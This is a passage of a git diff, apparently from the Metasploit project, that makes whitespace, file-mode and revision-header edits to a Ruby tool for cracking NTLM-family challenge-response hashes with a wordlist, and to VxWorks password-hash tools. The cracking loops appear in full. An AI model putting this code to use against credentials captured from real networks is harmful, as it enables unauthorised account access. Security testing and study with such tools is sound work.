password =~ /^.{1,14}$/ @@ -392,7 +392,7 @@ when "NETLMv1" found = true match_password = password break - end + end end end end @@ -404,7 +404,7 @@ when "NETLMv1" exit end when HASH_MODE - if not pass =~ /^.{1,14}$/ + if not pass =~ /^.{1,14}$/ $stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters" exit end @@ -423,7 +423,7 @@ when "NETLMv1" puts "[*] The NETLMv1 hash for #{pass.upcase} is : #{calculatedhash}" exit when PASS_MODE - if not pass =~ /^.{1,14}$/ + if not pass =~ /^.{1,14}$/ $stderr.puts "[*] NETLMv1 password can not be bigger then 14 characters" exit end @@ -468,18 +468,18 @@ when "NETNTLMv1" end found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase if calculatedhash == hash.upcase found = true match_password = password break - end + end end end if found @@ -498,7 +498,7 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase puts "[*] The NETNTLMv1 hash for #{pass} is : #{calculatedhash}" @@ -516,7 +516,7 @@ when "NETNTLMv1" $stderr.puts "[*] Server challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } calculatedhash = CRYPT::ntlm_response(argntlm).unpack("H*")[0].upcase @@ -554,21 +554,21 @@ when "NETNTLM2_SESSION" found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(password), :challenge => [ srvchal ].pack("H*") } optntlm = { :client_challenge => [ clichal ].pack("H*")} calculatedhash = CRYPT::ntlm2_session(argntlm,optntlm).join[24,24].unpack("H*")[0].upcase - + if calculatedhash == hash.upcase found = true match_password = password break - end + end end end if found @@ -595,7 +595,7 @@ when "NETNTLM2_SESSION" $stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } optntlm = { :client_challenge => [ clichal ].pack("H*")} @@ -623,7 +623,7 @@ when "NETNTLM2_SESSION" $stderr.puts "[*] Client challenge must be exactly 16 bytes of hexadecimal" exit end - argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), + argntlm = { :ntlm_hash => CRYPT::ntlm_hash(pass), :challenge => [ srvchal ].pack("H*") } optntlm = { :client_challenge => [ clichal ].pack("H*")} @@ -671,7 +671,7 @@ when "NETLMv2" found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password @@ -683,7 +683,7 @@ when "NETLMv2" found = true match_password = password break - end + end end end if found @@ -802,7 +802,7 @@ when "NETNTLMv2" found = false match_password = nil - File.open(list,"r") do |password_list| + File.open(list,"rb") do |password_list| password_list.each_line do |line| password = line.gsub("\r\n",'').gsub("\n",'') puts password @@ -815,7 +815,7 @@ when "NETNTLMv2" found = true match_password = password break - end + end end end if found diff --git a/tools/vxdigger.rb b/tools/vxdigger.rb index 99e2df9b53..f5784a8092 100755 --- a/tools/vxdigger.rb +++ b/tools/vxdigger.rb @@ -9,6 +9,8 @@ # # (C) 2010 Rapid7 # +# $Revision$ +# def usage $stderr.puts "usage: #{$0} [dump-file] " diff --git a/tools/vxencrypt.rb b/tools/vxencrypt.rb index dcb2bc8b77..7c8d7d3924 100755 --- a/tools/vxencrypt.rb +++ b/tools/vxencrypt.rb @@ -2,8 +2,8 @@ # # This script can be used to calculate hash values for VxWorks passwords. # - - +# $Revision$ +# def hashit(inp) if inp.length < 8 or inp.length > 120 diff --git a/tools/vxmaster.rb b/tools/vxmaster.rb index af6014b250..396f567dd8 100755 --- a/tools/vxmaster.rb +++ b/tools/vxmaster.rb @@ -9,6 +9,8 @@ # # (C) 2010 Rapid7 # +# $Revision$ +# # VxWorks converts the clear-text password into single integer value. This value